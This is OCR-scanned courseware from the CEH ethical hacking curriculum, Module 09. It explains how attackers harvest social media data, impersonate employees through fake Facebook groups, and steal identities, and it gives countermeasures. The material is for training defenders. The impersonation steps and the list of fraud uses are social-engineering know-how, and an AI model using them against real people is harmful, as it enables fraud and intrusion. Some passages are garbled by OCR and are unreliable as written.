Social networking sites are a treasure trove for attackers because people share their personal and professional information on these sites, such as name, address, mobile number, date of birth, project details, job designation, company name, and location. The more information people share on a social networking site, the more likely it is that an attacker can impersonate them to launch attacks against them, their associates, or their organization. They may also try to join the target organization’s employee groups to extract corporate data.

In general, the information attackers gather from social networking sites includes organization details, professional details, contacts and connections, and personal details, which they then use to execute other forms of social engineering attacks.

Module 09 Page 1376

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

Impersonation on Facebook

CE H

@ Theattacker creates a fake user group on Facebook labeled as for “Employees of” the target company @ Usinga false identity,the attacker then proceeds to "friend" or invite employees tothe fake group @ Users join the group and provide their credentials such as date of birth, educationaland employment backgrounds, spouses’ names, etc.



Christopher Nolan

| Usingthe details of any of these employees,the attackercan compromisea secured facility to gain accessto the building | Attackers scan detailsin profile pages. They use these for spear phishing, impersonation, and identity theft Copyright © by

Tita ur facebook com Al Rights Reserved. Reproduction i

Impersonation on Facebook Source: https://www.facebook.com Facebook is a well-known between friends who share users on Facebook, attackers fake accounts and try to add information.

social networking site that connects people. It is comments and upload photos, links, and videos. To use nicknames or aliases instead of their real names. “Friends” to view others’ profiles and obtain critical

widely used impersonate They create and valuable

The steps an attacker takes to lure a victim into revealing sensitive information: =

Create a fake user group on Facebook identified as "Employees of" the target company

=

Using a false identity, proceed to "friend," or invite actual employees to the fake group, “Employees of Company XYZ”

=

Users join the group and provide their credentials such as date of birth, educational and employment backgrounds, or spouses’ names.

=

Using the details of any one of the employees, an attacker can compromise a secured facility to gain access to the building

Attackers create a fake account and scan the details on the profile pages of various targets on social networking sites such as Linkedin and Twitter to engage in spear phishing, impersonation, and identity theft.

Module 09 Page 1377

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

7ii

NX About

Create post

peopl ie this indting 4 of your eds

‘tvistopher Nolan th Ashraf am or 15 others ee

Figure 9.15: Screenshot showing Facebook profile

Module 09 Page 1378

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Social Engineering

.

Exam 312-50 Certified Ethical Hacker

:

Social Networking

B

Data

Threats to Corporate

Theft

Networks

C iE H

Modification of Content

Involuntary Data Leakage

Ell

|

Malware Propagation

Targeted Attacks

18 |

Damage to Business Reputation

Network Vulnerability

9]

Infrastructure and Maintenance

Spam and Phishing

10]

Loss of Productivity

Copyright © by

Social Networking Threats to Corporate Networks Before sharing data on a social networking site, or enhancing their channels, groups, or profiles, private and corporate users should be aware of the following social or technical security risks: Data Theft: Social networking sites are huge databases worldwide, increasing the risk of information exploitation.

accessed

by

many

people

Involuntary Data Leakage: In the absence of a strong policy that sets clear lines between personal and corporate content, employees may unknowingly post sensitive data about their company on social networking sites, which might help an attacker to launch an attack on the target organization. Targeted Attacks: Attackers use the information posted on social networking sites to launch targeted attacks on specific users or companies. Network Vulnerability: All social networking sites are subject to flaws and bugs such as login issues and Java vulnerabilities, which attackers could exploit. This could, in turn, lead to the leakage of confidential information related to the target organization’s network. Spam and Phishing: Employees using work e-mail IDs on social networking sites will probably receive spam and become targets of phishing attacks, which could compromise the organization’s network. Modification of Content: In the absence of proper security measures and efforts to preserve identity, blogs, channels, groups, profiles, and other platforms can be spoofed or hacked.

Module 09 Page 1379

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

=

Malware Propagation: Social networking sites are ideal platforms spread viruses, bots, worms, trojans, spyware, and other malware.

for attackers

to

=

Business Reputation: Attackers can falsify information about an organization employee on social networking sites, resulting in loss of reputation.

=

Infrastructure and Maintenance Costs: Using social networking sites entails added infrastructure and maintenance resources for organizations to ensure that their defensive layers are effective safeguards.

=

Loss of Productivity: Organizations must monitor employees’ network activities to maintain security and ensure that such activities do not misuse the system and company

or an

resources.

Module 09 Page 1380

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

C/EH

LO#05: Explain Identity Theft

nis Strictly Pro

Identity Theft

CE H

‘@ Identity theft is a crime in which an imposter steals your personally identifiable information such as name, credit card number, social security or driver's license numbers, etc. to commit fraud or other

crimes \@ Attackers can use identity theft to impersonate employees of a target organization and physically

access facilities

Types of Identity Theft

Module 09 Page 1381

© Child identity theft © Criminal identity theft © Financial identity theft © Driver's license identity theft

© © © ©

Medical identity theft Taxidentity theft Identity cloning and Concealment Synthetic identity theft

©

©

Social security identity theft

Insuranceidentity theft

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

Identity Theft (Cont’d)

CE H

Common Techniques Attackers Use to Obtain Personal Information for Identity Theft

Theft of wallets, computers, laptops, cell phones, etc.

Pretextin;

Internet searches

Pharming

social engineering

Hacking (compromisinga

a Dumpster divingand 8 shoulder surfing

Phishing

Skimming

Indications of Identity Theft

@

8

Unfamiliar charges to your credit card

that you do not recognize

@ No longer receiving credit card, bank, or utility statements

user's system)

© Getting calls from the debit or credit fraud control department

Malware

© Charges for medical treatment or services

Wardriving

younever received

© No longer receiving electricity, gas, water, etc. service bills

Mail Theft and Rerouting

Identity Theft Identity theft is a problem that many consumers face today. In the United States, some state legislators have imposed laws restricting employees from providing their SSNs (Social Security Numbers) during their recruitment. Identity theft frequently figures in news reports. Companies should be informed about identity theft so that they do not endanger their own anti-fraud initiatives.

This section discusses identity theft, including types of identity theft, common techniques attackers use to obtain personal information for identity theft, and various indications of identity theft. The Identity Theft and Assumption Deterrence Act of 1998 defines identity theft as the illegal use of someone’s identification. Identity theft occurs when someone steals others’ personally identifiable information for fraudulent purposes. Attackers illegally obtain personally identifying information to commit fraud or other criminal acts. Types of personally identifiable information stolen by identity thieves: =

Name

=

Bank account number

=

Home and office address

=

Credit card information

=

Social security number

=

Credit report

=

Phone number

=

Driving license number

=

Date of birth

=

Passport number

Module 09 Page 1382

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Social Engineering

The attacker steals people’s identity for fraudulent purposes such as: =

To open new credit card accounts in the name of the user without paying the bills

=

To open anew phone or wireless account in the user’s name, or to run up charges on their existing account

=

To use the victims’ information to obtain utility services such as electricity, heating, or cable TV

=

To open bank accounts with the intention of writing bogus checks using the victim’s information

=

To clone an ATM or debit card to make electronic withdrawals from the victim’s

=

To obtain loans for which the victim is liable

=

To obtain a driver’s license, passport, or other official ID card that contains the victim’s data with the attacker’s photos

=

Using the victim’s name and Social Security number to receive their government benefits

=

To impersonate an employee of a target organization to physically access its facility

=

To take over the victim’s insurance policies

=

To sell the victim’s personal information

=

To order goods online using a drop-site

=

To hijack email accounts

=

To obtain health services

=

To submit fraudulent tax returns

=

To commit other crimes with the intention of providing the victim’s name to the authorities during arrest, instead of their own

accounts

Types of Identity Theft Identity theft is constantly increasing, and identity thieves are finding new ways or techniques to steal different types of target information. Some of the types of identity theft are as follows: =

Child Identity Theft This type of identity theft occurs when the identity of a minor is stolen. This is desirable because it may go undetected for a long time. After birth, parents apply for a Social Security Number for their child, which along with a different date of birth, is used by identity thieves to apply for credit accounts, loans or utility services, or to rent a place to live and apply for government benefits.

Module 09 Page 1383

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering =

Exam 312-50 Certified Ethical Hacker

Criminal Identity Theft This is one of the most common and most damaging types of identity theft. A criminal uses someone’s identity to escape criminal charges. When they are caught or arrested, they provide the assumed identity. The best way to protect against criminal identity theft is to keep all personal information secure, which includes following safe Internet practices and being cautious of “shoulder surfers.”

=

Financial Identity Theft This type of identity theft occurs when a victim’s bank account information is stolen and illegally used by a thief. They can max out a withdraw money from the account, or can use the stolen identity account, apply for new credit cards, and take out loans. The information to hack into the victim’s account and steal their information is obtained phishing attacks, or data breaches.

=

or credit card credit card and to open a new that is required through viruses,

Driver’s License Identity Theft

This type of identity theft is the easiest as it requires a little sophistication. A person can lose their driver’s license, or it can easily be stolen. Once it falls into the wrong hands, the perpetrator can sell the stolen driver’s license or misuse it by committing traffic violations, of which the victim is unaware of and fails to pay fines for, ending up with their license suspended or revoked. =

Insurance Identity Theft

Insurance identity theft is closely related to medical identity theft. It takes place when a perpetrator unlawfully takes the victim’s medical information to access their insurance for medical

treatment.

Its effects

include

difficulties

in settling

medical

bills,

higher

insurance premiums, and probable trouble in acquiring future medical coverage. =

Medical Identity Theft This is the most dangerous type of identity theft where the perpetrator uses the victim’s name or information without the victim’s consent or knowledge to obtain medical products and claim health insurance or healthcare services. Medical identity theft results in frequent erroneous entries in the victim’s medical records, which could lead to false diagnoses and life-threatening decisions by the doctors.

=

Tax Identity Theft This type of identity theft occurs when the perpetrator steals the victim’s Social Security Number to file fraudulent tax returns and obtain fraudulent tax refunds. It creates difficulties for the victim in accessing their legitimate tax refunds and results in a loss of funds. Phishing emails are one of the main tricks used by the criminal to steal a target’s information. Therefore, protection from such identity theft includes the adoption of safe Internet practices.

Module 09 Page 1384

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

Identity Cloning and Concealment This type of identity theft encompasses all forms of identity theft, where the perpetrators attempt to impersonate someone else simply in order to hide their identity. These perpetrators could be illegal immigrants, those hiding from creditors, or simply those who want to become “anonymous.” Synthetic Identity Theft This is one of the most sophisticated types of identity theft, where the perpetrator obtains information from different victims to create a new identity. Firstly, he steals a Social Security Number and uses it with a combination of fake names, date of birth, address, and other details required for creating a new identity. The perpetrator uses this new identity to open new accounts, loans, credit cards, phones, other goods, and services. Social Identity Theft This is another common type of identity theft where the perpetrator steals victim’s Social Security Number in order to derive various benefits such as selling it to an undocumented person, using it to defraud the government by getting a new bank account, loans, credit cards, or applying for and obtaining a new passport.

Common Theft

Techniques Attackers Use to Obtain Personal Information for Identity

Discussed below are some of the methods by which attackers steal targets’ identities, which in turn allow them to commit fraud and other criminal activities: Theft of wallets, computers, laptops, cell phones, backup media, and other sources of personal information Physical theft is common. Attackers steal hardware from places such as hotels and recreational places such as clubs, restaurants, parks, and beaches. Given adequate time, they can recover valuable data from these sources. Internet Searches Attackers can gather a considerable amount of sensitive information Internet sites, using search engines such as Google, Bing, and Yahoo!.

via

legitimate

Social Engineering Social engineering is the art of manipulating people into performing certain actions or divulging personal information and accomplishing their task without using cracking methods. Dumpster Diving and Shoulder Surfing Attackers rummage through household garbage and the trash bins of organizations, ATM centers, hotels, and other places to obtain personal and financial information for fraudulent purposes.

Module 09 Page 1385

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering Criminals may find user information identification numbers (PINs) typed overhearing conversations. =

Exam 312-50 Certified Ethical Hacker by glancing at documents, observing personal into automatic teller machines (ATM), or by

Phishing The “fraudster” may pretend to be from a financial institution or other reputable organization and send spam or pop-up messages to trick users into revealing their personal information.

=

Skimming Skimming refers to stealing credit or debit card numbers by using special storage devices called skimmers or wedges when processing the card.

=

Pretexting

Fraudsters may impersonate executives from financial institutions, telephone companies, and other businesses. They rely on “smooth-talking” and win the trust of an individual to reveal sensitive information. =

Pharming Pharming, also known as domain spoofing, is an advanced form of phishing in which the attacker redirects the connection between the IP address and its target server. The attacker may use cache poisoning (modifying the Internet address to that of a rogue address) to do so. When the users type in the Internet address, it redirects them to a rogue website that resembles the original.

=

Hacking (compromising a user’s system) Attackers may compromise user systems and router information using listening devices such as sniffers and scanners. They gain access to an abundance of data, decrypt it (if necessary), and use it for identity theft.

=

Keyloggers and Password Stealers (Malware)

An attacker may infect the user’s computer with trojans, viruses, or other malware and then record and collect the user’s keystrokes to steal passwords, usernames, and other sensitive information of personal, financial, or business import. Attackers may also use emails to send fake forms, such as Internal Revenue Service (IRS) forms, to gather information from their victims. =

Wardriving Attackers search for unsecured Wi-Fi wireless networks in moving vehicles containing laptops, smartphones, or PDAs. Once they find unsecured networks, they access any sensitive information stored on the devices of the users on those networks.

=

Mail Theft and Rerouting Often, mailboxes contain bank documents (credit cards or account statements), administrative forms, and other important correspondence. Criminals use this information to obtain credit card information or to reroute the mail to a new address.

Module 09 Page 1386

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

Indications of Identity Theft People do not realize that they are unknown and unauthorized issues importance that people watch out compromised. Listed below are some

the victim of identity theft until they experience some as a result of the theft. Therefore, it is of paramount for the warning signs that their identities have been of the signs of identity theft:

Unfamiliar charges to your credit card that you do not recognize. No longer receive credit card, bank, or utility statements Creditors call asking about an unknown account on your name. There are numerous traffic violations under your name that you did not commit. You receive charges for medical treatment or services you never received. There is more than one tax return filed under your name. Being denied access to your own services.

account and unable to take out loans or use other

Not receiving electricity, gas, water, or other services bills due to stolen mail.

Sudden changes in your personal medical records showing a condition you do not suffer from. Some additional indications of identity theft are as follow: Getting a notification that your information was compromised or misused breach in a company where you are an employee or have an account.

by a data

An inexplicable cash withdrawal from your bank account. Calls from debit or credit card fraud suspicious activities on your accounts.

control

departments

giving

warnings

about

A refusal of government benefits to you and your child because those benefits are already being received by some other account using your child’s Social Security Number. Your medical insurance plan rejects your authentic medical claim because tampered with your medical records, causing you to reach your benefit limit.

Module 09 Page 1387

someone

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

CEH

LO#06: Explain Social Engineering Countermeasures

Social Engineering Countermeasures Social engineers exploit human behavior (such as manners, enthusiasm toward work, laziness, or naivete) to gain access to the targeted company’s information resources. Social engineering attacks are difficult to guard against, as the victim might not be aware that he or she has been deceived. They are very much like the other kinds of attacks used to extract a company’s valuable data. To guard against social engineering attacks, a company needs to evaluate the risk of different kinds of attacks, estimate possible losses and spread awareness among its employees.

This section deals with countermeasures that an organization can implement to be more secure against social engineering attacks.

Module 09 Page 1388

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

Social Engineering Countermeasures

CE H

@ Good policies and procedures are ineffective they are not taughtand reinforced by employees @ After receiving training, employees should sign a statement acknowledging that they understand the policies @ The main objectives of social engineering defense strategies are to create user awareness, robustinternal network controls, and secure policies, plans, and processes Password Policies

@ Periodic password changes © Avoiding guessable passwords . | @

Account blocking after failed attempts

Physical Security Policies

© Identification of employees by issuingID cards, uniforms, etc. © Escorting visitors @

Restricting access to work areas

© Increasing length and complexity

© Proper shredding of useless

© Improvingsecrecy of passwords

© Employing security personnel

of passwords

Defense Strategy

@ Social engineering campaign , © Gapanalysis _ ©

Remediation strategies



documents

iv |

L|

Social Engineering Countermeasures (Cont’d)

CE H

3 | Train individualson security policies

[6 | Background check and proper termination process

[2 | Implement proper access privileges

[7 | Anti-virus/anti-phishing defenses

[3 |

[a |

Presence of proper incidence response time

Implement two-factor authentication

| 4 | Availability of resources only to authorized users

| 9 | Adopt documented change management

is | Scrutinize information

| 10 | Ensure software is regularly updated s Reserved. Reproduction is Strictly Prohibited

Social Engineering Countermeasures Attackers implement social engineering techniques to trick people into revealing organizations’ confidential information. They use social engineering to perform fraud, identity theft, industrial espionage, and other disreputable behaviors. To guard against social engineering attacks, organizations must develop effective policies and procedures; however, merely developing them is not enough.

Module 09 Page 1389

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

To be truly effective, an organization should:

Disseminate policies Specialized training engineering threats.

among employees and provide proper education and training. benefits employees in higher-risk positions against social

Obtain employee signatures on a statement acknowledging that they understand the organization’s policies. Define the consequences of policy violations. The main objectives of social engineering defense strategies are to create robust internal network controls, and security policies, plans, and processes. Official security policies and procedures help employees decisions. They should include the following safeguards:

or users

make

user awareness, the

right security

Password Policies Password policies stating the following guidelines help to increase password security: o

Change passwords regularly.

o

Avoid passwords that are easy to guess. It is possible to guess passwords from answers to social engineering questions such as, “Where were you born?” “What is your favorite movie?” or "What is your pet’s name?"

o

Block user accounts if a user exceeds a certain number of failed attempts to guess a password.

o

Choose long (minimum of 6 — 8 characters) alphanumeric and special characters) passwords.

o

Donot disclose passwords to anyone.

o

Set up a password expiration policy.

and

complex

Password Security policies often include advice on proper password example:

(using

management,

o

Avoid sharing a computer account.

o

Avoid using the same password for different accounts.

o

Avoid storing passwords on media

o

Avoid communicating passwords over the phone or through email or SMS.

o

Be sure to lock or shut down the computer before stepping away from it.

note.

or writing them

down

on a

various

notepad

for

or sticky

Physical Security Policies Physical security policies address the following areas. o

Issue identification cards (ID cards), and uniforms, along with other access control measures to the employees of the organization.

Module 09 Page 1390

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

o

Office security lounges.

or personnel

must

o

Restrict access to certain areas of an organization to prevent from compromising the security of sensitive data.

o

Dispose of old documents that contain valuable information by using equipment such as paper shredders and burn bins. This prevents information gathering by attackers using techniques such as dumpster diving.

o

Employ security personnel in an organization to protect people and property — supplement trained security personnel with alarm systems, surveillance cameras, and other equipment.

o

Dispose of devices characters.

by overwriting

escort

the

visitors to designated

disk’s content

with

visitor rooms

unauthorized

Os,

1s,

and

or

users

random

Defense Strategy o

Social Engineering Campaign: An organization should conduct numerous social engineering exercises using different techniques on a diverse group of people in order to examine how its employees might react to real social engineering attacks.

©

Gap Analysis: Using the information obtained from the social engineering campaign, a gap analysis evaluates the organization based on industry-leading practices, emerging threats, and mitigation strategies.

o

Remediation Strategies: Depending upon the result of the evaluation in the analysis, organizations develop a detailed remediation plan to mitigate weaknesses or the loopholes found in the earlier step. The plan focuses mainly educating and creating awareness among employees based on their roles identifying and mitigating potential threats to the organization.

gap the on and

Additional Countermeasures Against Social Engineering Train Individuals on Security Policies: An efficient training program consists of basic social engineering concepts and techniques, all security policies, and methods to increase awareness of social engineering. Implement Proper Access Privileges: There should be administrator, accounts with respective levels of authorization.

user, and guest

Presence of a Proper Incidence Response Time: There should be proper guidelines for reacting to a social engineering attempt. Availability of Resources Only to Authorized Users: Make sure sensitive information is secured and that resources are only accessed by authorized users Scrutinize Information: Categorize the information as top internal use only, and for public use, or use other categories.

secret,

proprietary,

for

Perform a Background Check and Proper Termination Process: Insiders with a criminal background and terminated employees are easy targets for procuring information. Module 09 Page 1391

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

=

Anti-Virus and Anti-Phishing Defenses: Use multiple layers of anti-virus defenses end-user and mail gateway levels to minimize social engineering attacks.

=

Implement Two-Factor Authentication: Instead of fixed passwords, use two-factor authentication for high-risk network services such as VPNs and modem pools. In the two-factor authentication (TFA) approach, the user must present two different forms of proof of identity. If an attacker is trying to break into a user account, then they need to break both forms of user identity, which is more difficult to do. Hence, TFA is a defensein-depth security mechanism and part of the multifactor authentication family. The two pieces of evidence that a user provides could include a physical token such as a card, and is typically something the person can remember without much effort, such as a security code, PIN, or password.

=

Adopt Documented Change Management: A documented change-management process is more secure than the ad-hoc process.

=

Ensure a Regular Update of Software: Organizations should ensure that the system and software are regularly patched and updated as the attackers exploit unpatched and outof-date software to obtain useful information to launch an attack.

=

Implement a Hardware Policy: Ensure that individuals are aware of what hardware can be used. For example, the use of USB drives should be disallowed.

=

Implement a Software Policy: Ensure that only legitimate specify the individuals responsible for software installation.

=

Verify Identity and Authorization:

=

software

is installed

at

and

o

Employees must verify the email header and the links provided in the mail before accessing them.

o

Employees must verify the identity of individuals requesting information.

Implement a Spam Filter: Set up spam filters to avoid inbox flooding and stop infected emails from reaching the device.

Module 09 Page 1392

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

al — |

How to Defend against Phishing Attacks?

CE H

Educate individuals by conducting phishing campaigns

oo a

Check emails for generic salutations, spelling, and grammar mistakes

feo]

SS @

Hover over links to identify whether they point to the correct location

5

Enable spam filters that detect emails from suspicious sources

Confirm the sender before providing the information via email Ensure that employees use HTTPS-protected websites

Verify the profile pictures of a suspicious account by performing a reverse image search Immediately report social media accounts confirmed to be fake

How to Defend against Phishing Attacks? Listed below are some countermeasures against phishing attempts: Educate individuals by conducting phishing campaigns. Enable spam filters that detect emails from suspicious sources. Avoid responding to emails requesting sensitive information. Hover over links to identify whether they point to the correct location. Never provide credentials over the phone. Check emails for generic salutations, spelling, and grammar mistakes. Confirm the sender before providing any requested information via email.

Ensure that employees use HTTPS-protected websites. Implement multi-factor authentication (MFA) to prevent whaling attacks. Individuals should contact the organization provided on the official website.

via email

addresses

or phone

numbers

Verify the profile pictures of a suspicious account by performing a reverse image search. Immediately report social media accounts confirmed to be fake. Lodge a complaint at a cybercrime office if any social media account engages in bullying for money.

Module 09 Page 1393

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

Detecting Insider Threats

CE H

Insider Risk Controls

@ Insider data risk presents another layer of complexity for security professionals, which requires designingsecurity infrastructure that can efficiently monitor user permissions, access controls, : and user actions

Deterrence

@ The security framework must contain safeguards, recommended actions by the employee and IT professionals, separation of duties, assigning privileges, etc.

Controls

@ Security professionals can use tools such as DLP (Symantec Data Loss Prevention, SecureTrust Data Privacy, etc.) and IAM (SailPoint IdentitylQ, RSA SecurD Suite, etc.) to deter insiderthreats

@ Security professionals must use a varietyof security controls and tools to analyze and detect insider Detection Controls

threats

; ; | © Toolssuch as IDS/IPS (Check Point Quantum Intrusion Prevention System (IPS), IBM Security Network Intrusion Prevention System, etc.), Log Management (SolarWinds Security Event Manager, Splunk, etc.), and SIEM (ArcSight ESM, LogRhythm NextGen SIEM Platform, etc.) may be used

Detecting Insider Threats Most data attacks come from insiders, which only makes them more difficult to prevent or detect. Insiders are mostly aware of the security loopholes of the organization, and they exploit them to steal confidential information. It is essential to carefully handle insider threats as they are difficult to thwart and may incur huge financial losses and business interruptions. Some of the methods to detect insider threats are given below: Insider Risk Controls Insider data risk presents another layer of complexity for security professionals. It requires designing security infrastructure in such a way that user permissions, access controls, and user actions are monitored efficiently. Deterrence Controls

The organization’s security framework must contain safeguards, follow recommended actions of the employee and IT professionals, provide a separation of duties, and assign privileges. These security controls eliminate or minimize the security risks to the organization’s critical assets. The deterrence controls that the security professionals must have in place to deter insider threats are DLP (Data Loss Prevention) tools, and Identity and Access Management (IAM) tools.

Some of the deterrence controls are: o

DLP Tools:

e

Module 09 Page 1394

Symantec Data Loss Prevention (https://www.symantec.com)

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

o

=

Exam 312-50 Certified Ethical Hacker

e

SecureTrust Data Privacy (https://securetrust.com)

©

Check Point Quantum Data Loss Prevention (DLP) (https://www.checkpoint.com)

IAMTools:

e

SailPoint IdentitylQ (https://www.sailpoint.com)

e

RSA SecurID

©

Core Access Assurance Suite (https://www.coresecurity.com)

Suite (https://www.rsa.com)

Detection Controls Security professionals must use a variety of security controls and tools to analyze and detect insider threats in organizations. The detection controls that the security professionals must have in place to detect insider threats are IDS/IPS (Intrusion detection and prevention systems), log management systems, and Security Information and Event Management (SIEM) tools. Some of the detection controls are: o

o

o

IDS/IPS Tools o

Check Point Quantum Intrusion Prevention System (IPS) (https://www.checkpoint.com)

e

IBM Security Network Intrusion Prevention System (https://www.ibm.com)

e

USM Anywhere ( https://cybersecurity.att.com)

Log Management Tools e

SolarWinds Security Event Manager (https://www.solarwinds.com)

e

Splunk (https://www.splunk.com)

©

Loggly (https://www.loggly.com)

SIEM Tools

©

ArcSight ESM (https://www.microfocus.com)

e

LogRhythm NextGen SIEM Platform (https://logrhythm.com)

e

SolarWinds Security Event Manager (https://www.solarwinds.com)

Module 09 Page 1395

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

Insider Threats Countermeasures [Oy separation and rotation of duties

Archive critical data

Least privileges

Employee training on cyber security

Controlled access

Employee background verification

Logging and auditing

Periodic risk assessment

Employee monitoring

Privileged users monitoring

Legal policies

Credentials deactivation for terminated employees s Reserved Reproduction

Insider Threats Countermeasures There are safety measures that help an organization to prevent or minimize insider threats: Separation and rotation of duties: Divide responsibilities among multiple employees to restrict the amount of power or influence held by any individual. This helps to avoid fraud, abuse, and conflict of interest and facilitates the detection of control failures (including bypassing security controls and information theft). Rotation of duties at random intervals helps an organization to deter fraud or the abuse of privileges. Least privileges: Provide users with only enough access privilege to allow them perform their assigned tasks. This helps maintain information security. Controlled access: Access controls in various parts of an organization unauthorized users from gaining access to critical assets and resources.

to

restrict

Logging and auditing: Perform logging and auditing periodically to check for misuse of

company resources.

Employee monitoring: Use employee monitoring software that records all user sessions, and that can be reviewed by security professionals. Legal policies: Enforce legal policies to prevent organization’s resources and sensitive data theft.

employees

from

misusing

the

Archive critical data: Maintain a record of the organization’s critical data in the form of archives to be used as backup resources, if needed. Employee training on cybersecurity: Train employees on how to protect their credentials and the company’s confidential data from attack. They will be able to identify social engineering attempts and take proper mitigations and reporting steps. Module 09 Page 1396

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

=

Employee background verification: Ensure thorough background checks of all employees before hiring them by using Google search and social networking sites and consulting previous employers.

=

Periodic risk assessment: Perform a periodic risk assessment on critical assets to identify vulnerabilities and implement protection strategies against both insider and outsider threats.

=

Privileged users monitoring: Implement additional monitoring mechanisms for system administrators and privileged users as these accounts can be used to can deploy malicious code or logic bomb on the system or network.

=

Credentials deactivation for terminated employees: Disable all the employee’s access profiles to the physical locations, networks, systems, applications, and data immediately after termination.

=

Periodic risk assessments: Perform periodic risk assessments on all the organization’s critical assets then develop and maintain a risk management strategy to secure those assets from both insiders and outsiders.

=

Layered defense: Implement multiple layers of defense to prevent and protect critical assets from remote attacks originated from insiders. Develop appropriate remote access policies and procedures to thwart such attacks.

=

Physical security: Build a professional security team that monitors the physical security of the organization.

=

Surveillance: Install video cameras to monitor screen-capturing software on all critical servers.

=

Zero-Trust Model: Implement a zero-trust model to limit access to critical assets of the organization. Furthermore, implement additional identity verification measures such as MFA to guarantee the secure use of the assets.

=

Behavioral Analytics: Employ user entity and behavioral analytics collect, and analyze the data to identify anomalous behavior.

Module 09 Page 1397

all critical

assets.

Install

and

(UEBA)

enable

to track,

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

Identity Theft Countermeasures 1 |

Secure or shred all documents containing your private information

6 |

Be cautious and verify all requestsfor personal data

Ensure your name is not presentin marketers’

7 |

Protect your personal information from being

hit lists

3]

CEH

Review your credit card statement regularly and store it securely, out of reach of others

Keep° your mail secure by emptying the mailbox quickly

|

Do not display or share any account/contact numbers unless mandatory

Never give any personal information over the phone 5 |

publicized

|

Monit lonitor

0 |

online line

bankii banking

activities tivitis regularly lark

] |

Never list any personal identifiers on social media

Identity Theft Countermeasures Identity theft occurs when someone uses personal information (such as a name, social security number, date of birth, mother’s maiden name, or address) in a malicious way, such as for credit card or loan services, or even rentals and mortgages, without the person’s knowledge or permission.

Listed below are countermeasures that, on implementation, will reduce the chances of identity

theft:

Secure or shred all documents containing private information Ensure your name is not present on the marketers’ hit lists Review your credit card statement regularly and store it securely, out of reach of others

Never give any personal information over the phone To keep mail secure, empty the mailbox quickly Suspect and verify all requests for personal data Protect personal information from being publicized

Do not display account or contact numbers unless mandatory Monitor online banking activities regularly

Never list any personal identifiers on social media websites such as your father’s name, pet’s name, address, or city of birth. Enable two-factor authentication on all online accounts Never use public Wi-Fi for sharing or accessing sensitive information Module 09 Page 1398

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Social Engineering

Exam 312-50 Certified Ethical Hacker

